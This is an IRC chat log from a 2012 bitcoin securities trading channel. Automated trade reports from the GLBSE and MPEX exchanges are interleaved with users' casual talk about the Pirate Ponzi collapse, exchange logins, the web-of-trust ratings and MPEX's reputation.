17:12:24 after struggling to keep warm Aug 29 17:22:34 [MPEX] [F.GIGA.ETF] 6900 @ 0.00096661 = 6.6696 BTC [+] Aug 29 17:29:37 [GLBSE] [ASICMINER] 1 @ 0.12 BTC [-] Aug 29 17:31:25 Pretty hot here to diablo Aug 29 17:32:34 [GLBSE] [FUTUREFUND] 100 @ 0.00012189 = 0.0122 BTC [+] Aug 29 17:36:20 [GLBSE] [BITCOINRS] 14 @ 0.05 = 0.7 BTC [-] Aug 29 17:43:36 [GLBSE] [BTCWEB] 100 @ 0.1 = 10 BTC [-] Aug 29 17:48:34 [GLBSE] [CIUCIU.BOND] 1 @ 0.1 BTC [+] Aug 29 17:52:10 [GLBSE] [SILVER] 10 @ 0.00999999 = 0.1 BTC [-] Aug 29 17:52:58 [GLBSE] [GIGAMINING] 1 @ 0.8789 BTC [-] Aug 29 17:55:59 wait, did I say it was 72 out? Aug 29 17:56:02 I meant 69. Aug 29 17:56:09 thermomitor was in the sun, its not now Aug 29 17:56:28 BitCoinINV: thats the thing Aug 29 17:56:30 any other year Aug 29 17:56:46 it'd be so fucking hot out I'd be parked infront of the air conditioner Aug 29 17:56:54 I havent turned it on once Aug 29 17:59:02 [GLBSE] [BITCOINRS] 22 @ 0.050999 = 1.122 BTC [+] Aug 29 18:04:03 [GLBSE] [ARS] 10 @ 0.013 = 0.13 BTC [-] Aug 29 18:05:22 [GLBSE] [GSDPT] 125 @ 0.00338999 = 0.4237 BTC [+] Aug 29 18:09:46 [GLBSE] [GSDPT] 125 @ 0.00338999 = 0.4237 BTC [+] Aug 29 18:11:18 [GLBSE] [DMC] 20 @ 0.06889999 = 1.378 BTC [+] Aug 29 18:15:35 [GLBSE] [DMC] 40 @ 0.06 = 2.4 BTC [-] Aug 29 18:21:05 [MPEX] [S.MPOE] 16348 @ 0.00039264 = 6.4189 BTC [+] Aug 29 18:21:46 hmm Aug 29 18:22:40 is anything important missing here http://smpake.com/faq.php Aug 29 18:25:07 damn nyan.c has turned to shit. what's the new target? .10? Aug 29 18:26:40 [GLBSE] [IBB] 1 @ 0.6 BTC [+] Aug 29 18:27:39 i think nyan.c was fully into pirate Aug 29 18:28:26 [GLBSE] [ASICMINER] 100 @ 0.115 = 11.5 BTC [-] Aug 29 18:28:28 [GLBSE] [ASICMINER] 6 @ 0.1133 = 0.6798 BTC [-] Aug 29 18:28:29 [GLBSE] [ASICMINER] 1 @ 0.113 BTC [-] Aug 29 18:28:30 [GLBSE] [ASICMINER] 5 @ 0.11130001 = 0.5565 BTC [-] Aug 29 18:28:32 [GLBSE] [ASICMINER] 35 @ 0.1113 = 3.8955 BTC [-] Aug 29 18:28:33 [GLBSE] [ASICMINER] 10 @ 0.11120001 = 1.112 BTC [-] Aug 29 18:28:33 [GLBSE] [ASICMINER] 50 @ 0.1112 = 5.56 BTC [-] Aug 29 18:28:34 [GLBSE] [ASICMINER] 20 @ 0.11100001 = 2.22 BTC [-] Aug 29 18:28:35 [GLBSE] [ASICMINER] 96 @ 0.111 = 10.656 BTC [-] Aug 29 18:28:37 [GLBSE] [ASICMINER] 47 @ 0.11000001 = 5.17 BTC [-] Aug 29 18:38:12 Nope we were 60-70% into pirate Aug 29 18:42:33 [GLBSE] [TYGRR.BOND-P] 42 @ 0.16 = 6.72 BTC [+] Aug 29 18:46:59 !ticker TYGRR.BOND-P Aug 29 18:47:06 [GLBSE:TYGRR.BOND-P] [Bid: 0.08] [Ask: 0.16] [Spread: 0.08] [Last: 0.16] [24hVol: 573.65851626] [7dAvg: 0.42657223] Aug 29 18:47:38 [GLBSE] [BITCOINMINV] 2 @ 0.13 = 0.26 BTC [-] Aug 29 18:49:50 can you add spread % ? It is calculated: 100 × (ASK - BID) / ASK Aug 29 18:50:47 .calc 100x(0.16-0.08)/0.16 Aug 29 18:50:48 100x(0.16-0.08)/0.16 = 50.0 x Aug 29 18:50:49 Note that .calc is deprecated, consider using .c Aug 29 18:50:56 .c 100x(0.16-0.08)/0.16 Aug 29 18:50:56 50 Aug 29 18:51:13 50% spread is nice Aug 29 18:51:45 [GLBSE] [OBSI.HRPT] 4 @ 0.10478 = 0.4191 BTC [-] Aug 29 18:57:42 [GLBSE] [PPT.B] 6 @ 0.3501 = 2.1006 BTC [-] Aug 29 18:57:44 [GLBSE] [PPT.B] 100 @ 0.35 = 35 BTC [-] Aug 29 19:01:40 did you guys see the "GOOD NEWS!"? Aug 29 19:03:05 What pirate won the lottery? JK Aug 29 19:05:55 BitCoinINV: no Aug 29 19:06:41 the bitcoin community is moving on from pirate discussion finally? Aug 29 19:07:59 I doubt it Aug 29 19:08:51 [GLBSE] [BDT] 3 @ 1.04999999 = 3.15 BTC [-] Aug 29 19:09:01 it the GOOD NEWS profit plan Aug 29 19:09:26 if you all start buying tygr-p's, there will be tiny bubble and profit :) Aug 29 19:09:30 1) Good news Aug 29 19:09:33 2) ... Aug 29 19:09:36 3) proffit Aug 29 19:09:41 simple! Aug 29 19:09:45 LOL :) Aug 29 19:11:25 the tygr-p's are trading too high as is it Aug 29 19:11:36 *as it is Aug 29 19:12:11 [GLBSE] [PUREMINING] 1 @ 0.09567 BTC [-] Aug 29 19:14:15 [MPEX] [S.MPOE] 28910 @ 0.00039264 = 11.3512 BTC [+] Aug 29 19:18:53 [GLBSE] [TEEK.B] 1 @ 0.94946 BTC [+] Aug 29 19:26:38 [GLBSE] [TEEK.B] 1 @ 0.94946 BTC [+] Aug 29 19:32:05 [GLBSE] [ASICMINER] 2 @ 0.12979999 = 0.2596 BTC [+] Aug 29 19:33:46 gabbynot: you are 1/2 right Aug 29 19:34:15 hmm? Aug 29 19:35:57 [MPEX] [S.MPOE] 19300 @ 0.00039317 = 7.5882 BTC [+] Aug 29 19:44:42 [MPEX] [S.MPOE] 1000 @ 0.00039264 = 0.3926 BTC [-] Aug 29 19:48:10 I am looking to buy BDK anyone want to sell some? ^^ Aug 29 19:49:34 [GLBSE] [JTME] 1 @ 0.9449 BTC [-] Aug 29 19:52:34 [GLBSE] [OBSI.HRPT] 7 @ 0.10478 = 0.7335 BTC [-] Aug 29 19:55:17 [MPEX] [F.GIGA.ETF] 2000 @ 0.0009627 = 1.9254 BTC [-] Aug 29 19:55:18 [MPEX] [F.GIGA.ETF] 1220 @ 0.00096661 = 1.1793 BTC [+] Aug 29 19:55:20 [MPEX] [F.GIGA.ETF] 1220 @ 0.0009692 = 1.1824 BTC [+] Aug 29 19:55:21 [MPEX] [F.GIGA.ETF] 3960 @ 0.00096923 = 3.8382 BTC [+] Aug 29 20:06:06 [GLBSE] [GIGAMINING] 4 @ 0.8789 = 3.5156 BTC [-] Aug 29 20:06:54 [GLBSE] [PPT.A] 34 @ 0.3615 = 12.291 BTC [-] Aug 29 20:07:33 [GLBSE] [GIGAMINING] 1 @ 0.879 BTC [+] Aug 29 20:07:45 [GLBSE] [PPT.E] 8 @ 0.3615 = 2.892 BTC [-] Aug 29 20:07:47 [GLBSE] [PPT.E] 18 @ 0.35 = 6.3 BTC [-] Aug 29 20:08:30 [GLBSE] [PPT.B] 4 @ 0.3001 = 1.2004 BTC [-] Aug 29 20:09:35 [GLBSE] [GIGAMINING] 8 @ 0.879 = 7.032 BTC [+] Aug 29 20:12:05 [GLBSE] [PPT.E] 1 @ 0.35 BTC [-] Aug 29 20:13:04 [GLBSE] [PPT.A] 1 @ 0.3615 BTC [-] Aug 29 20:13:35 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 29 20:18:00 [GLBSE] [FPGAMINING] 1 @ 0.8946699 BTC [-] Aug 29 20:21:06 [GLBSE] [OBSI.HRPT] 1 @ 0.10479 BTC [+] Aug 29 20:22:50 [GLBSE] [OBSI.HRPT] 2 @ 0.10479 = 0.2096 BTC [+] Aug 29 20:24:42 [MPEX] [S.MPOE] 4201 @ 0.00039264 = 1.6495 BTC [-] Aug 29 20:28:11 [MPEX] [S.MPOE] 6641 @ 0.00039264 = 2.6075 BTC [-] Aug 29 20:28:13 [MPEX] [S.MPOE] 20772 @ 0.00039245 = 8.152 BTC [-] Aug 29 20:28:14 [MPEX] [S.MPOE] 12814 @ 0.00039209 = 5.0242 BTC [-] Aug 29 20:36:56 [MPEX] [O.BTCUSD.C100N] 423 @ 0.25483303 = 107.7944 BTC [+] Aug 29 20:47:21 I am buying BDK shares at 0.12 BTC per share :) Send me a message if you are interested Aug 29 20:47:50 in during DeaDTerra making my btc grow. Aug 29 20:47:59 [GLBSE] [BITCOINMINV] 4 @ 0.13788 = 0.5515 BTC [+] Aug 29 20:48:14 in during DeaDTerra making my btc grow. huh? Aug 29 20:49:16 my 1 btc :< Aug 29 20:54:20 [GLBSE] [GIGAMINING] 6 @ 0.8201 = 4.9206 BTC [-] Aug 29 20:54:22 [GLBSE] [GIGAMINING] 8 @ 0.82 = 6.56 BTC [-] Aug 29 20:54:23 [GLBSE] [GIGAMINING] 3 @ 0.82 = 2.46 BTC [-] Aug 29 20:54:24 [GLBSE] [GIGAMINING] 20 @ 0.8113 = 16.226 BTC [-] Aug 29 20:54:26 [GLBSE] [GIGAMINING] 9 @ 0.8112 = 7.3008 BTC [-] Aug 29 20:54:27 [GLBSE] [GIGAMINING] 1 @ 0.8111 BTC [-] Aug 29 20:54:27 [GLBSE] [GIGAMINING] 10 @ 0.811 = 8.11 BTC [-] Aug 29 20:54:28 [GLBSE] [GIGAMINING] 1 @ 0.81 BTC [-] Aug 29 20:54:29 [GLBSE] [GIGAMINING] 3 @ 0.81 = 2.43 BTC [-] Aug 29 20:54:30 [GLBSE] [GIGAMINING] 38 @ 0.8 = 30.4 BTC [-] Aug 29 20:55:03 [GLBSE] [GIGAMINING] 62 @ 0.8 = 49.6 BTC [-] Aug 29 21:04:13 ;;getrating Diablo-D3 Aug 29 21:04:14 WARNING: Currently not authenticated. User Diablo-D3, rated since Mon Apr 25 10:54:20 2011. Cumulative rating 16, from 6 total ratings. Received ratings: 6 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Diablo-D3 Aug 29 21:08:16 Wolf_L: i don't think that Diablo-D3 actually used the wot anymore Aug 29 21:08:33 I never did really Aug 29 21:08:39 D thinks that it is a failed system Aug 29 21:08:41 it doesnt work, ratings are not meta rated Aug 29 21:09:32 but it saved us from pi.. oh. yeah. Aug 29 21:11:17 pigeons: idealy it would have ";;rate pi -1 likely runs a ponzi. pays 7% and doesn't explain the function of the operation" Aug 29 21:11:23 there should've been a lot of those Aug 29 21:12:02 i see the failure in the humans, not the machine Aug 29 21:12:08 yeah. Aug 29 21:12:49 in hindsight, there should've been a fuckload of those sort of rating, lol Aug 29 21:13:07 Buy MOAR GSDPT :P Aug 29 21:13:20 ;;view Aug 29 21:13:20 #9842 Mon Aug 27 10:39:32 2012 smickles BUY 1.0 '0-262-24039-4' @ 2 BTC (None) Aug 29 21:14:12 0.0 Aug 29 21:14:22 [MPEX] [S.MPOE] 13273 @ 0.00039317 = 5.2185 BTC [+] Aug 29 21:14:22 [MPEX] [S.MPOE] 25500 @ 0.00039338 = 10.0312 BTC [+] Aug 29 21:14:24 [MPEX] [S.MPOE] 2027 @ 0.00039399 = 0.7986 BTC [+] Aug 29 21:16:04 [MPEX] [F.GIGA.ETF] 5235 @ 0.00095695 = 5.0096 BTC [-] Aug 29 21:16:30 ;;ticker GSDPT Aug 29 21:16:31 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Aug 29 21:16:40 ;;glbse GSDPT Aug 29 21:16:41 Error: "glbse" is not a valid command. Aug 29 21:16:50 ;;pl GSDPT Aug 29 21:16:51 Error: "pl" is not a valid command. Aug 29 21:17:11 !ticker ABM Aug 29 21:17:12 Invalid ticker. Aug 29 21:17:28 glbse is offline it seems like Aug 29 21:17:44 damn Aug 29 21:17:48 Again? Aug 29 21:18:02 up again :) Aug 29 21:18:19 !ticker ABM Aug 29 21:18:21 [GLBSE:ABM] [Bid: 0.12] [Ask: 0.33999] [Spread: 0.21999] [Last: 0.36] [24hVol: ] [7dAvg: ] Aug 29 21:18:24 https://glbse.com/asset/view/GSDPT Aug 29 21:18:34 [GLBSE] [TEEK.PPT] 4 @ 0.2 = 0.8 BTC [+] Aug 29 21:18:43 !ticker FDBF Aug 29 21:18:46 [GLBSE:FDBF] [Bid: 0.11] [Ask: 0.1499998] [Spread: 0.0399998] [Last: 0.1499998] [24hVol: ] [7dAvg: 0.13833328] Aug 29 21:25:37 [GLBSE] [NASTY] 1 @ 0.53 BTC [-] Aug 29 21:25:38 [GLBSE] [NASTY] 1 @ 0.52 BTC [-] Aug 29 21:25:40 [GLBSE] [NASTY] 1 @ 0.51 BTC [-] Aug 29 21:25:41 [GLBSE] [NASTY] 7 @ 0.50010001 = 3.5007 BTC [-] Aug 29 21:25:41 [GLBSE] [NASTY] 60 @ 0.50000001 = 30 BTC [-] Aug 29 21:26:48 [GLBSE] [DMC] 10 @ 0.0688999 = 0.689 BTC [+] Aug 29 21:30:17 Wolf_L: !pl gsdpt Aug 29 21:32:52 [GLBSE] [BDK.BND] 50 @ 0.101 = 5.05 BTC [+] Aug 29 21:36:35 [GLBSE] [GIPPT] 2 @ 0.629 = 1.258 BTC [+] Aug 29 21:40:23 !pl gsdpt Aug 29 21:40:24 !pl [@] [] Aug 29 21:43:56 [GLBSE] [ASICMINER] 1 @ 0.1123 BTC [-] Aug 29 21:43:57 [GLBSE] [ASICMINER] 35 @ 0.1121 = 3.9235 BTC [-] Aug 29 21:43:59 [GLBSE] [ASICMINER] 8 @ 0.112 = 0.896 BTC [-] Aug 29 21:44:00 [GLBSE] [ASICMINER] 50 @ 0.112 = 5.6 BTC [-] Aug 29 21:44:01 [GLBSE] [ASICMINER] 100 @ 0.111 = 11.1 BTC [-] Aug 29 21:44:02 [GLBSE] [ASICMINER] 100 @ 0.11 = 11 BTC [-] Aug 29 22:04:31 ;;ticker Aug 29 22:04:32 Best bid: 10.849, Best ask: 10.84999, Bid-ask spread: 0.00099, Last trade: 10.849, 24 hour volume: 68414, 24 hour low: 10.55, 24 hour high: 11.20999 Aug 29 22:14:11 [GLBSE] [FUTUREFUND] 1 @ 0.00012189 BTC [+] Aug 29 22:17:01 [MPEX] [S.MPOE] 17883 @ 0.0003922 = 7.0137 BTC [-] Aug 29 22:17:02 [MPEX] [S.MPOE] 37229 @ 0.00039209 = 14.5971 BTC [-] Aug 29 22:17:33 [GLBSE] [FUTUREFUND] 5 @ 0.00012189 = 0.0006 BTC [+] Aug 29 22:19:37 [GLBSE] [FUTUREFUND] 4 @ 0.00012189 = 0.0005 BTC [+] Aug 29 22:23:39 [MPEX] [F.GIGA.ETF] 9100 @ 0.00095695 = 8.7082 BTC [-] Aug 29 22:24:31 [GLBSE] [GSDPT] 45 @ 0.00338999 = 0.1525 BTC [+] Aug 29 22:24:33 [GLBSE] [GSDPT] 250 @ 0.00339 = 0.8475 BTC [+] Aug 29 22:31:17 [GLBSE] [OBSI.HRPT] 26 @ 0.10479 = 2.7245 BTC [+] Aug 29 22:32:06 [GLBSE] [PUREMINING] 2 @ 0.091 = 0.182 BTC [-] Aug 29 22:32:07 [GLBSE] [PUREMINING] 5 @ 0.09 = 0.45 BTC [-] Aug 29 22:34:09 [GLBSE] [YABMC] 5 @ 0.1188 = 0.594 BTC [-] Aug 29 22:34:47 [GLBSE] [BBBB] 100 @ 0.00025 = 0.025 BTC [-] Aug 29 22:45:00 [GLBSE] [OBSI.HRPT] 2 @ 0.10479 = 0.2096 BTC [+] Aug 29 22:45:34 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.92307692 BTC [+] Aug 29 22:46:53 http://en.wikipedia.org/wiki/Wikipedia_talk:Articles_for_creation/Bitcoin_Savings_and_Trust Aug 29 22:50:50 [GLBSE] [V.HRL] 1 @ 1 BTC Aug 29 22:55:09 [GLBSE] [DMC] 58 @ 0.066 = 3.828 BTC [-] Aug 29 22:56:31 [GLBSE] [TYGRR.BOND-P] 10 @ 0.169 = 1.69 BTC [+] Aug 29 22:56:33 [GLBSE] [TYGRR.BOND-P] 2 @ 0.17 = 0.34 BTC [+] Aug 29 22:56:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.1735 BTC [+] Aug 29 23:01:11 _matthew_'s betting count https://docs.google.com/spreadsheet/ccc?key=0Ajtx05YrHtIydFVHcGxLOExTbnhqajJLZmlSZUNtM3c#gid=0 Aug 29 23:01:29 It's so painful Aug 29 23:01:35 Indeed Aug 29 23:09:02 [GLBSE] [DMC] 74 @ 0.067 = 4.958 BTC [+] Aug 29 23:12:02 [GLBSE] [DMC] 29 @ 0.0688999 = 1.9981 BTC [+] Aug 29 23:12:39 [GLBSE] [OBSI.1MHS] 1 @ 0.093 BTC [-] Aug 29 23:19:08 http://rt.com/usa/news/investors-currency-digital-fund-868/ Aug 29 23:19:13 !ticker Tygrr.bond-p Aug 29 23:19:15 [GLBSE:TYGRR.BOND-P] [Bid: 0.08800001] [Ask: 0.1735] [Spread: 0.08549999] [Last: 0.1735] [24hVol: 558.43161626] [7dAvg: 0.40682081] Aug 29 23:21:49 [GLBSE] [DMC] 1 @ 0.0688999 BTC [+] Aug 29 23:22:15 so i'm thinking of starting a new company Aug 29 23:22:36 [MPEX] [F.GIGA.ETF] 8889 @ 0.00096923 = 8.6155 BTC [+] Aug 29 23:22:38 [MPEX] [F.GIGA.ETF] 5711 @ 0.00096924 = 5.5353 BTC [+] Aug 29 23:23:05 Oh, for? Aug 29 23:23:47 it will be a magnificent and splendiferous producer Aug 29 23:23:53 [GLBSE] [FOO.PPPPT] 18 @ 0.0601 = 1.0818 BTC [+] Aug 29 23:23:54 of kitchen apparel Aug 29 23:24:02 our first product will be the world famous trendon cheese shaver Aug 29 23:24:03 lol Aug 29 23:24:11 Okay, Jay Leno. Aug 29 23:24:14 im thinking of ipo on glbse ? Aug 29 23:24:39 cool ;) Aug 29 23:25:24 it shaves cheeze! it shaves wood! Aug 29 23:25:28 it shaves glass! Aug 29 23:25:31 and there's nothing in the bowl! Aug 29 23:25:35 Yellow cheese. White cheese. Aug 29 23:25:47 bitcoin cheese Aug 29 23:25:50 Put 100% cheese in, get 7% cheese out. Aug 29 23:25:56 grana pabtcana Aug 29 23:26:00 You can't explain that. Aug 29 23:27:14 [GLBSE] [BITCOINMINV] 200 @ 0.1275 = 25.5 BTC [-] Aug 29 23:27:37 ;;ticker Aug 29 23:27:38 Best bid: 10.761, Best ask: 10.76102, Bid-ask spread: 0.00002, Last trade: 10.76102, 24 hour volume: 65365, 24 hour low: 10.55, 24 hour high: 11.17001 Aug 29 23:27:45 o hey, so basically threading water huh Aug 29 23:29:23 ;;bc,price Aug 29 23:29:23 Next Price Estimate: 11.83655 | Next Price In About 2 days, 21 hours, 40 minutes, and 14 seconds Aug 29 23:29:54 < Wolf_L> You can't explain that. << therefore: aliens? Aug 29 23:30:14 Aliens poisoned the cheese in Trendon Shaver's fridge. Aug 29 23:30:31 He ate said cheese and then began to mismanage BTCST funds. Aug 29 23:30:40 [MPEX] [S.MPOE] 788 @ 0.00039139 = 0.3084 BTC [-] Aug 29 23:30:40 [MPEX] [S.MPOE] 15900 @ 0.00039164 = 6.2271 BTC [+] Aug 29 23:30:41 [MPEX] [S.MPOE] 20119 @ 0.00039312 = 7.9092 BTC [+] Aug 29 23:30:43 [MPEX] [S.MPOE] 14615 @ 0.00039399 = 5.7582 BTC [+] Aug 29 23:30:53 !ticker gsdpt Aug 29 23:31:16 [GLBSE:GSDPT] [Bid: 0.00305] [Ask: 0.00339] [Spread: 0.00034] [Last: 0.00339] [24hVol: 102.36874472] [7dAvg: 0.00362555] Aug 29 23:31:19 o hay lol Aug 29 23:32:20 what is the s.mpoe security? i'm not on mpex so I wouldn't know. Aug 29 23:32:42 [GLBSE] [BITCOINMINV] 1 @ 0.13787 BTC [+] Aug 29 23:32:51 asa http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Aug 29 23:33:02 basically the conglomeration of options trader + mpex Aug 29 23:33:14 ty sir! Aug 29 23:33:56 [GLBSE] [NYAN.C] 1 @ 0.5 BTC [-] Aug 29 23:34:08 gwaaa! glbse always seems to reroute me to that damn captcha, i have to put my username, pw, and auth token in multiple times just to access my account :P Aug 29 23:34:31 [GLBSE] [TYGRR.BOND-P] 13 @ 0.1735 = 2.2555 BTC [+] Aug 29 23:34:32 [GLBSE] [TYGRR.BOND-P] 25 @ 0.175 = 4.375 BTC [+] Aug 29 23:34:33 [GLBSE] [TYGRR.BOND-P] 2 @ 0.17899 = 0.358 BTC [+] Aug 29 23:34:42 ug Aug 29 23:34:45 and a gain, Aug 29 23:34:52 *again Aug 29 23:34:59 captcha captcha captcha Aug 29 23:36:38 Smickles Aug 29 23:36:45 Just click the top bar Aug 29 23:37:22 When it brings you to the page with the captcha, just click the Glbse icon on the top left Aug 29 23:37:29 it will then just bypass that Aug 29 23:37:41 [GLBSE] [OBSI.HRPT] 4 @ 0.10479 = 0.4192 BTC [+] Aug 29 23:37:48 ok, but it sends me to the captcha page again Doffx Aug 29 23:37:51 >.< Aug 29 23:37:55 heck security is this ?! Aug 29 23:38:07 Odd, it just lets me log in lol Aug 29 23:38:20 As long as my cookie hasent expired anyhow Aug 29 23:38:42 ok, I got in. literally after minutes of trying Aug 29 23:38:45 I log out at the end of the day so that it asks for my google auth later Aug 29 23:38:51 for a fucking login Aug 29 23:39:00 Its a shitty login Aug 29 23:39:10 Aug 29 23:39:14 funny thing is... people whine about mpex being difficult. Aug 29 23:39:23 It takes me usually 4-5 tries to enter my google auth code Aug 29 23:40:01 It always takes me one ... Aug 29 23:40:03 Its not difficult its confusing because of the layout, you need a good front end. Aug 29 23:40:07 Maybe GLBSE likes me Aug 29 23:40:58 Mircea doesn't believe in the almighty Front End. Aug 29 23:40:58 Really mpex is just so simple it appears confusing haha Aug 29 23:41:25 the front end took a walk down the river ben Aug 29 23:41:26 d Aug 29 23:41:50 Your bigger issue mircea_popescu is that girl alienated too many people early on Aug 29 23:42:14 she didn’t help the site much at all, she was right, but people dont like to be told they are wrong. Aug 29 23:42:32 Doffx i was just discussing this in private as it happens Aug 29 23:42:42 Doffx: mircea_popescu gave her a signed statement to tell people to "fuck off" Aug 29 23:42:53 https://bitcointalk.org/index.php?topic=103623.msg1141603#msg1141603 read this thread, check out her references there Aug 29 23:43:00 and then say with me : s/people/idiots Aug 29 23:43:16 should've gotten naked on forum thread Aug 29 23:43:22 everyone's butthurt cause she told them back in april what they;re discovering now, in august. Aug 29 23:43:34 and that was really hard to swallow then and is really hard to swallow now. Aug 29 23:44:22 [GLBSE] [TYGRR.BOND-P] 5 @ 0.173 = 0.865 BTC [-] Aug 29 23:45:07 giga was all whining at me to get rid of her "cause she reflects badly" and whatnot... well... let her reflect on me and let pirate reflect on them, tis fine i say. Aug 29 23:45:22 [GLBSE] [ASICMINER] 8 @ 0.1249 = 0.9992 BTC [+] Aug 29 23:46:29 wait Aug 29 23:46:35 gigavps is a girl Aug 29 23:46:42 naked. on. forum. thread. Aug 29 23:46:43 It really doesn’t matter now, its not an 'm right, your wrong thing. She scared people off, and you spend a lot of time defending the actions when it could have been avoided. Aug 29 23:46:44 nah, he's a married dude. Aug 29 23:46:51 jcpham lol. she's hawt. Aug 29 23:46:55 :) Aug 29 23:47:18 http://en.wikipedia.org/wiki/Wikipedia_talk:Articles_for_creation/Bitcoin_Savings_and_Trust Aug 29 23:47:18 Doffx im not sure i follow. Aug 29 23:47:25 Please add whatever is needed Aug 29 23:47:59 The damage was done to the mpex image whether or not she was right, or whether you care. Aug 29 23:48:22 what damage is this ? Aug 29 23:48:35 I think you would have got more people early on. Aug 29 23:48:41 for free you mean ? Aug 29 23:48:44 I also think your fine not having those people. Aug 29 23:48:48 Considerable damage is what it is. Aug 29 23:48:49 i think the forum is garbage Aug 29 23:49:00 BTC-Mining im trying to follow his thought here. Aug 29 23:49:00 For free and paid. Aug 29 23:49:00 and her actions have little consequwnce Aug 29 23:49:18 jcpham well not everyone knows this. Aug 29 23:49:49 it is something everyone needs ot figure out on their own Aug 29 23:50:27 come to think about it, how come you're not on my new invite only forum ? Aug 29 23:50:33 [GLBSE] [FUTUREFUND] 5 @ 0.000118 = 0.0006 BTC [-] Aug 29 23:50:52 which people whined i should make and now aren't using :D Aug 29 23:51:35 I think wish mpex was the dominant exchange, I think all this PPT bs wouldnt be happening right now, and we would have way less bullshit offerings. Aug 29 23:52:20 tbh i pay attention to press and technical developments and not much else Aug 29 23:52:24 certainly no drama Aug 29 23:52:35 We might even have an Mpex front end too! Aug 29 23:52:54 Doffx i guess you see the wisdom of having a 100k+ a month exchange BEFORE the frontend Aug 29 23:53:00 people keep building things in the wrong order. Aug 29 23:53:05 [GLBSE] [SYNERGY] 10 @ 0.16 = 1.6 BTC [+] Aug 29 23:53:07 [GLBSE] [SYNERGY] 6 @ 0.1505 = 0.903 BTC [-] Aug 29 23:53:19 I do, and I learned the hard way with Glbse. Aug 29 23:53:21 but at any rate i'd have never approved pirate crap. Aug 29 23:53:59 to have a business you gotta have a business model. Aug 29 23:54:17 [GLBSE] [COGNITIVE] 6 @ 0.6001 = 3.6006 BTC [-] Aug 29 23:54:19 [GLBSE] [COGNITIVE] 10 @ 0.6 = 6 BTC [-] Aug 29 23:54:19 [GLBSE] [COGNITIVE] 4 @ 0.55 = 2.2 BTC [-] Aug 30 00:01:00 22:50.49 ( mircea_popescu ) which people whined i should make and now aren't using :D Aug 30 00:01:03 its always like that Aug 30 00:01:34 yep. Aug 30 00:02:00 i dont terribly mind, it was 15 minutes or w/e Aug 30 00:02:54 can one change the template of the forum? Aug 30 00:03:02 my eyes kinda hurt with this default one Aug 30 00:03:13 yes Aug 30 00:04:13 which forum you mean, btcf ? Aug 30 00:05:08 yes Aug 30 00:05:33 o, you can pick any theme you want and i'll install it. Aug 30 00:05:35 jus say. Aug 30 00:06:31 ok ill find onw Aug 30 00:06:33 one Aug 30 00:07:57 :D Aug 30 00:08:26 im accually not at home atm so ill prolly send it tomorrow Aug 30 00:11:40 [GLBSE] [PAJKA.BOND] 3 @ 0.06 = 0.18 BTC [+] Aug 30 00:11:51 not any rush Aug 30 00:20:43 [GLBSE] [OBSI.HRPT] 10 @ 0.1045 = 1.045 BTC [-] Aug 30 00:21:08 [GLBSE] [PAJKA.BOND] 14 @ 0.06 = 0.84 BTC [+] Aug 30 00:22:04 [GLBSE] [TYGRR.BOND-P] 25 @ 0.11 = 2.75 BTC [-] Aug 30 00:22:52 [GLBSE] [JLP-BMD] 2 @ 0.09999 = 0.2 BTC [+] Aug 30 00:24:36 [GLBSE] [OBSI.HRPT] 1 @ 0.1039 BTC [-] Aug 30 00:27:16 [GLBSE] [TEEK.B] 1 @ 0.811 BTC [-] Aug 30 00:27:18 [GLBSE] [TEEK.B] 1 @ 0.81 BTC [-] Aug 30 00:27:19 [GLBSE] [TEEK.B] 5 @ 0.7803 = 3.9015 BTC [-] Aug 30 00:27:20 [GLBSE] [TEEK.B] 2 @ 0.7802 = 1.5604 BTC [-] Aug 30 00:27:43 [GLBSE] [NASTY] 7 @ 0.5011 = 3.5077 BTC [+] Aug 30 00:27:45 [GLBSE] [NASTY] 3 @ 0.501 = 1.503 BTC [-] Aug 30 00:35:44 [GLBSE] [BIB.PIRATE] 6 @ 0.15449875 = 0.927 BTC [+] Aug 30 00:36:12 ;;ticker Aug 30 00:36:13 Best bid: 10.76642, Best ask: 10.897, Bid-ask spread: 0.13058, Last trade: 10.897, 24 hour volume: 54516, 24 hour low: 10.55, 24 hour high: 11.134 Aug 30 00:39:09 [GLBSE] [PPT.B] 1 @ 0.31 BTC [+] Aug 30 00:41:36 [MPEX] [F.GIGA.ETF] 2089 @ 0.00096924 = 2.0247 BTC [+] Aug 30 00:41:38 [MPEX] [F.GIGA.ETF] 1693 @ 0.0009696 = 1.6415 BTC [+] Aug 30 00:42:27 [GLBSE] [GSDPT] 30 @ 0.00339 = 0.1017 BTC [+] Aug 30 00:42:30 [GLBSE] [OBSI.HRPT] 12 @ 0.10449 = 1.2539 BTC [+] Aug 30 00:54:15 [GLBSE] [TYGRR.BOND-PI] 18 @ 0.9999999 = 18 BTC [-] Aug 30 01:00:12 [GLBSE] [NASTY] 1 @ 0.5 BTC [-] Aug 30 01:00:23 bitfoo https://bitcointalk.org/index.php?topic=35775.msg587428#msg587428 remember bakc in the day ? :D Aug 30 01:06:37 [GLBSE] [MOVETO.FUND] 15 @ 1.19739576 = 17.9609 BTC [+] Aug 30 01:09:05 [GLBSE] [JTME] 2 @ 0.944 = 1.888 BTC [-] Aug 30 01:09:35 [GLBSE] [TCC] 1 @ 0.0001 BTC [-] Aug 30 01:10:20 [GLBSE] [JTME] 2 @ 0.9448 = 1.8896 BTC [+] Aug 30 01:15:34 [GLBSE] [BITCOINRS] 1 @ 0.050999 BTC [+] Aug 30 01:15:43 [GLBSE] [OBSI.HRPT] 1 @ 0.10449 BTC [+] Aug 30 01:16:58 [GLBSE] [OBSI.HRPT] 2 @ 0.10449 = 0.209 BTC [+] Aug 30 01:30:08 [GLBSE] [OBSI.HRPT] 6 @ 0.10449 = 0.6269 BTC [+] Aug 30 01:30:37 [GLBSE] [BDK] 39 @ 0.1 = 3.9 BTC [+] Aug 30 01:44:00 http://oglaf.com/media/comic/overbite.jpg ahaha o god this is too funny Aug 30 01:57:29 This comic website seems more pervert than funny or anything else... Aug 30 01:57:41 [GLBSE] [BMF] 50 @ 0.58999 = 29.4995 BTC [+] Aug 30 01:58:31 well... de gustibus as they say Aug 30 01:59:02 I personally recommend cyanide & happiness Aug 30 01:59:03 [GLBSE] [BMF] 50 @ 0.58999 = 29.4995 